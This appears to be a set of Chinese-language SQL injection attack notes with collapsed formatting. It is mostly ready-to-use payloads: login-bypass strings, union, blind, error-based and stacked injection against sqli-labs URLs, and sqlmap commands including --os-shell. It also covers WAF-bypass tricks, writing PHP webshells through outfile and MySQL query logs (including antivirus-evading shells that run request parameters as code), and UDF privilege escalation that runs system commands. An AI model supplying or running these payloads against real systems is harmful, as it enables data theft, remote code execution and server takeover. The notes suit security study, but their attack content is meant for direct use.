sql注入
数据库知识
数据库结构:
mysql
1 2 库-表-字段(数据)database ->table ->column ->
常用sql语句:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 # 数据库创建 mysql> create database school; # 查询数据库 mysql> show databases; # 创建表 mysql> create table student(id int(10),username varchar(20),mail varchar(20)); # 查询表 mysql> show tables; # 插入数据 mysql> insert into student(id ,username,mail) values(1,"zhangsan" ,"zs@redteam.com" ); mysql> insert into student(id ,username,mail) values(2,"lisi" ,"ls@redteam.com" ); # 查询数据 mysql> select mail from student;mysql> select * from student;# 修改数据 mysql> update student set username="zhangsan2" where id = 1 ; # 删除数据 mysql> delete from student where id = 1; # 删除表 mysql> drop table student; # 删除数据库 mysql> drop database school; # 查询登录的用户 mysql> select user();# 查询数据存放地址 mysql> select @@datadir;# 查询数据库的版本 mysql> select version();# where 条件,limit 条件mysql> select * from users where id ='id' limit 0,1;
PHP连接数据库语句
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php $host = "localhost" ;$user = "root" ;$pass = "root" ;$conn = mysql_connect ($host ,$user ,$pass ); mysql_select_db ("school" ); $sql = "select * from student" ;$result = mysql_query ($sql ); while ($row = mysql_fetch_array ($result )){ echo "id:" .$row ["id" ]." username:" .$row ["username" ]." mail:" .$row ["mail" ]."<br>" ;?>
sql注入
原理
闭合符号如'、"、'),达到执行其他语句的效果
万能密码
sql语句:
SELECT * FROM users WHERE username= '".$username."' AND Password= '".md5($password)."'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ' or 1=' 1'or' ='or' "or " a"=" a' having 1=1# a' having 1 =1--'-- admin' or 1 =1--' or 1=1# admin' or '1' ='1' --' or ' 1'=' 1' OR 4=4/* ' )or ('a' ='a or 4=4-- "or 4=4-- ' or 4 =4/*'or' a'=' a"or" ="a'='a 'or''=' 'or'='or' ' OR '1'='1 'OR 4=4%00 " or 4 =4%00'or' 1'=' 1or '1' ='1' =1or '1' ='1' or 4 =4' UNION Select 1,1,1 FROM admin Where ' '=' ' union select 1,1,1 as password,1,1,1 %23
union注入
union的使用:sql语句1 union sql语句2
如果字段数相同的话会同时返回,且sql语句1出错时只返回sql语句2
注入流程:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 判断注入点:1 or 1 =1 1 and 1 =2 union 1 ' and 1 =1 # 1 ' and 1 =2 # 1 ' or 1 =1 # 1 ' union ……# -1 ' order by 4 # -1 ' union select 1 ,2 ,3 # -1 ' union select 1 ,2 ,database ()# -1 ' union select 1 ,2 ,table_name from information_schema.tables where table_schema=database () limit 0 ,1 # -1 ' union select 1 ,2 ,group_concat (column_name) from information_schema.columns where table_name='users' limit 0 ,1 # -1 ' union select 1 ,2 ,id from sqli.users limit 0 ,1
布尔盲注
1 2 3 4 1 ' and substr(database(),1,1)=' s'--+ 1' and length(database ())>=1 1 ' and length(select database())>=1--+ 1' and ascii(substr((database (),1 ,1 ))>80
报错注入
updatexml
1 2 3 4 5 6 7 8 9 10 0x3a 、0x7e 是为了在xpath中是语法错误的127.0 .0 .1 /sqli/Less-2 /?id=1 and updatexml(1 ,concat(0x3a ,database (),0x3a ),1 ) 127.0 .0 .1 /sqli/Less-2 /?id=1 and updatexml(1 ,concat(0x7e ,(select group_concat(table_name ) from information_schema.tables where table_schema='security' ),0x7e ),1 ) 127.0 .0 .1 /sqli/Less-2 /?id=1 and updatexml(1 ,concat(0x7e ,(select group_concat(column_name ) from information_schema.columns where table_schema='security' and table_name ='users' ),0x7e ),1 ) 127.0 .0 .1 /sqli/Less-2 /?id=1 and updatexml(1 ,concat(0x7e ,(select group_concat(id,0x7e ,username,0x7e ,password ) from security .users),0x7e ),1 ) 127.0 .0 .1 /sqli/Less-2 /?id=1 and updatexml(1 ,concat(0x7e ,(select group_concat(id,0x7e ,username,0x7e ,(select password from users limit 0 ,1 )) from security .users),0x7e ),1 )
1 2 3 4 5 6 7 8 9 10 11 12 描述:使用xpath表示法从XML 字符串中提取值xml 标记127.0 .0 .1 /sqli/Less-2 /?id=1 and extractvalue(1 ,concat(0x7e ,concat(database ())))127.0 .0 .1 /sqli/Less-2 /?id=1 and extractvalue(1 ,concat(0x7e ,concat((select group_concat(table_name ) from information_schema.tables where table_schema='security' ))))127.0 .0 .1 /sqli/Less-2 /?id=1 and extractvalue(1 ,concat(0x7e ,concat((select group_concat(column_name ) from information_schema.columns where table_schema='security' and table_name ='users' ))))127.0 .0 .1 /sqli/Less-2 /?id=1 and extractvalue(1 ,concat(0x7e ,(select group_concat(id,0x7e ,username,0x7e ,password ) from security .users)))
floor()
floor的讲解参考:https://www.cnblogs.com/litlife/p/8472323.html
1 2 3 4 5 6 7 8 9 floor,count,group by 冲突报错127.0 .0 .1 /sqli/Less-2 /?id=1 and (select 1 from (select count(*),concat(database (),0x7e ,floor(rand(0 )2 ))x from information_schema.tables group by x) a)127.0 .0 .1 /sqli/Less-2 /?id=1 and (select 1 from (select count(),concat('~' ,(select table_name from information_schema.tables where table_schema='security' limit 3 ,1 ),'~' ,floor(rand(0 )2 )) as a from information_schema.tables group by x)a) 127.0 .0 .1 /sqli/Less-2 /?id=1 and (select 1 from (select count(),concat('~' ,(select column_name from information_schema.columns where table_schema='security' limit 5 ,1 ),'~' ,floor(rand(0 )2 )) as a from information_schema.tables group by x)a) 127.0 .0 .1 /sqli/Less-2 /?id=1 and (select 1 from (select count() ,concat('~' (select concat(username,";",password ,";")from security .users limit 5 ,1 ),floor(rand(0 )*2 ))x from security .users group by x)a)
exp()
1 2 3 4 5 6 7 8 数据库名:127.0 .0 .1 /sqli/Less-2 /?id=1 and exp(~(select *from (select database ())x))127.0 .0 .1 /sqli/Less-2 /?id=1 and exp(~(select *from (select group_concat(table_name ) from information_schema.tables where table_schema='security' )x))127.0 .0 .1 /sqli/Less-2 /?id=1 and exp(~(select *from (select group_concat(column_name ) from information_schema.columns where table_schema='security' and table_name ='users' )x))127.0 .0 .1 /sqli/Less-2 /?id=1 and exp(~(select *from (select group_concat(username,0x7e ,password ) from security .users)x))
其他
参考https://blog.csdn.net/weixin_54217950/article/details/122938063
如果显示不完整: substring(database(),5,10)
Substring是字符截取函数,从数据里面第五个字符开始截取十个字符
时间盲注
if(expr1,expr2,expr3)->如果expr1是true,则返回expr2;否则返回expr3。
1 2 3 4 1 ' and if(length(database())>1 ,sleep(5 ),1 )--+1 ' and if(substr(database(),1 ,1 )='s',sleep(5 ),1 )--+1 ' and if(ord(substr(database(),1 ,1 ))=114 ,sleep(5 ),1 )--+
堆叠注入
1 2 3 4 5 1 ';show databases# 1 ;show databases# 1 ;show databases;1 ';show tables# 1 ';show columns from words#
改表、字段名
有words表和1919810931114514表情况下
1. 将表words的名称改为其他的(如words1),
2. 将1919810931114514改为words.
3. 将flag改为id,
4. 在输入栏中输入1' or 1=1,将其中的数据全部输出,即为flag.语句:
1 2 3 rename tables words to words1 ;rename tables 1919810931114514 to words ;alter table words change flag id varchar (100 );#
sqlmap使用
参考资料:https://blog.csdn.net/u011377996/article/details/81368482
sql注入的防御: https://blog.51cto.com/u_12332766/2137035
https://www.freebuf.com/vuls/265308.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 常用语句://127.0.0.1/sqli-labs/Less-1/ ?id=1//127.0.0.1/sqli-labs/Less-1/ ?id=1 --dbs //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security --tables //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security -T users --columns //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security -T users -C username,password --dump //127.0.0.1/sqli-labs/Less-1/ ?id=1 --users //127.0.0.1/sqli-labs/Less-1/ ?id=1 --password //127.0.0.1/sqli-labs/Less-1/ ?id=1 --current-db //127.0.0.1/sqli-labs/Less-1/ ?id=1 --current-user //127.0.0.1/sqli-labs/Less-1/ ?id=1 --current-db //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security --tables //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security -T users --columns //127.0.0.1/sqli-labs/Less-1/ ?id=1 -D security -T users --dump //127.0.0.1/sqli-labs/Less-1/ ?id=1 --dump-all //192.168.75.141/sqli-labs/Less-1/ ?id=1 --file-read=/etc/os-release //192.168.75.141/sqli-labs/Less-1/ ?id=1 --file-write=/root/test .php --file-dest=/var/www/html/test .php//192.168.75.141/sqli-labs/Less-1/ ?id=1 --os-shell --level 探测等级:1-5,默认为1,等级越高,payload越多,速度越慢。HTTP cookei在level为2时就会测试,HTTP User-Agent/Referer在level为3时就会测试。--risk 危险登录:1-3,默认为1,等级越高,越可能对数据库造成破坏--id-dba 确认当前用户为管理权限(是否为root权限,mssql下最高权限为sa)--sql-shell 运行自定义sql语句--os-cmd ,--os-shell 运行任意操作系统命令--file-read 从数据库服务器中读取文件--file-write 上传文件到数据库服务器中--flush-session 清空已保存的会话信息--dbs 所有数据库--current-db 网站当前数据库--users 所有数据库用户--current-user 当前数据库用户--random-agent 构造随机user-agent--passwords 数据库密码--proxy http://local :8080 –threads 10 (可以自定义线程加速) 代理--time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)--threads= 使用多少线程
Bypass waf
绕过and、or
绕过空格
绕过order by
1 1 /**/ order/*/ // // /*/ by 3
绕过union select
1 2 3 1 /**/u nion/*/ // // /*/ /*!50441select*/ 1 ,2 ,3
绕过database(),user()
1 1 /**/u nion/*/ // // /*/ /*!50441select*/ 1 ,database(/*/ // */),user(/ *// /*/ )
获取表名
1 1 union 1 ,2 ,group_concat(table_name ) from information_schema.tables where table_schema=database ()
获取列名
1 1 /**/u nion/*/ // // /*/ /*!50441select*/ %201 ,2 ,group_concat(column_name) from information_schema.columns where%20 table_schema=database(/*/ // */) and/ *// // /*/ table_name="admin"
获取数据
1 1 union 1 ,group_concat(password ),group_concat(username) from admin
fuzz
mysql写shell、提权
shell
一般情况下 Linux 系统下面权限分配比较严格,MySQL
用户一般情况下是无法直接往站点根目录写入文件的,在 Windows
环境下成功率会很高。
outfile和dumpfile
条件
要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道
gpc为off,on的话单引号被转义了,语句就不能正常执行了
要有file权限,默认情况下只有root有
select user,file_priv from mysql.user;
对目录要有写权限
secure_file_priv的值非NULL或为导出的绝对路径
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL,即默认禁止导入导出 Mysql<5.5.53
默认为空,即默认无限制
show global variables like '%secure_file_priv%';
union
1 2 3 4 5 ?id=1' union select 1,' <?php phpinfo ();?> ',3 into outfile 'C:/shell.php'%23 ?id=1' union select 1,' <?php phpinfo ();?> ',3 into dumpfile 'C:/shell.php'%23 hex id=-1' union select 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile "C:/shell.php"%23
非union
使用fields terminated by与lines terminated by写shell
1 2 3 4 ?id=1 into outfile 'C:/info.php' FIELDS TERMINATED BY ' <?php phpinfo ();?> '%23 ?id=1 into outfile 'C:/info.php' FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e %23 ?id=1 into outfile 'C:/info.php' lines terminated by ' <?php phpinfo ();?> '%23 ?id=1 into outfile 'C:/info.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e %23
outfile和dumpfile的区别
outfile
1 2 3 4 支持多行数据同时导出union 联合查询时,要保证两侧查询的列数相同
dumpfile
1 2 3 4 每次只能导出一行数据dump file ,应该手动添加 limit 限制
日志写shell(general_log)
secure_file_priv Mysql>=5.5.53
默认为NULL,即默认禁止导入导出 Mysql<5.5.53
默认为空,即默认无限制
在5.5.53版本后无法用sql语句修改secure_file_priv
,利用日志将shell写入日志中
条件
对目录要有写权限
高权限运行 MySQL 或者 Apache
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 查看配置,日志是否开启,和mysql默认log地址(记下原地址方便恢复) show variables like '%general%'; 开启日志监测,默认关闭(如果一直开文件会很大的) set global general_log = on; 设置日志路径 set global general_log_file = '/var/www/html/info.php'; 执行查询,写入shell select ' <?php phpinfo ();?> '; 结束后,恢复日志路径,关闭日志监测 set global general_log = off; SQL查询免杀shell select " <?php $sl = create_function ('' , @$_REQUEST ['cmd' ]);$sl ();?> "; SELECT " <?php $p = array ('f' =>'a' ,'pffff' =>'s' ,'e' =>'fffff' ,'lfaaaa' =>'r' ,'nnnnn' =>'t' );$a = array_keys ($p );$_ =$p ['pffff' ].$p ['pffff' ].$a [2 ];$_ = 'a' .$_ .'rt' ;$_ (base64_decode ($_REQUEST ['cmd' ]));?> ";
慢查询getshell(slow_query_log)
如果是普通日志,开启日志监测后文件会很大,网站访问量大的话我们写的shell会出错
使用慢查询日志时,只有当查询时间超过系统时间时才会记录在日志中
1 2 3 4 5 6 7 8 9 10 查看慢查询信息是否开启show variables like '%slow_query_log%' ;set global slow_query_log= 1 ;set global slow_query_log_file= 'C:\\phpStudy\\WWW\\shell.php' ;show global variables like '%long_query_time%' select '<?php @eval($_POST[abc]);?>' or sleep(11 );
udf提权
user defined function,用户自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在
MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL
语句中调用,就像调用本机函数 version () 等方便。
udf在mysql>=5.1的版本中,存在于mysql/lib/plugin目录下,文件后缀为.dll,常用c语言编写。
流程
1 2 3 4 5 6 7 8 9 10 11 12 13 14 查看secure_file_privshow variables like '%secure_file_priv%' ;show variables like '%plugin%' ;.1 以后基本不可能成功)select 1 into dumpfile 'D:\\env\\php\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin::$index_allocation' ;create function sys_eval returns string soname 'lib_mysqludf_sys_64.dll' ;select * from mysql.func where name = 'sys_eval' ;select sys_eval('whoami' );drop function sys_eval;
这里注意如果有webshell可以直接上传dll或so文件就直接上传即可
如果有注入,但是无webshell,可以利用sqlmap,因为 GET
有字节长度限制 ,所以往往 POST
注入才可以执行这种攻击
1 sqlmap -u "http://localhost:3306/" --data= "id=1" --file-write= "./lib_mysqludf_sys_64.so" --file-dest= "/usr/lib/mysql/plugin/udf.so"
如果没有注入,但可以操作原生sql语句,例如进入phpmyadmin中
利用16进制into
dumpfile写入,具体payload查询:https://www.sqlsec.com/tools/udf.html
1 2 直接 SELECT 查询十六进制写入\\ env\\ php\\ phpstudy_pro\\ Extensions\\ MySQL5.7.26\\ lib\\ plugin\\ udf.dll';
dll和so文件
sqlmap中.dll和.so文件的路径:sqlmap/data/udf/mysql
不过 sqlmap 中
自带这些动态链接库为了防止被误杀都经过编码处理过,不能被直接使用。不过可以利用
sqlmap 自带的解码工具cloak.py来解码使用
1 2 3 4 5 6 7 8 9 10 └─$pwd /mnt/ c/Penetration/ DatabaseTools/SQLMap/ extra/cloak$python3 cloak.py -d -i ../../ data/udf/my sql/linux/ 32 /lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so$python3 cloak.py -d -i ../../ data/udf/my sql/linux/ 64 /lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so$python3 cloak.py -d -i ../../ data/udf/my sql/windows/ 32 /lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll$python3 cloak.py -d -i ../../ data/udf/my sql/windows/ 64 /lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
更多攻击方法参考
https://www.sqlsec.com/2020/11/mysql.html#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0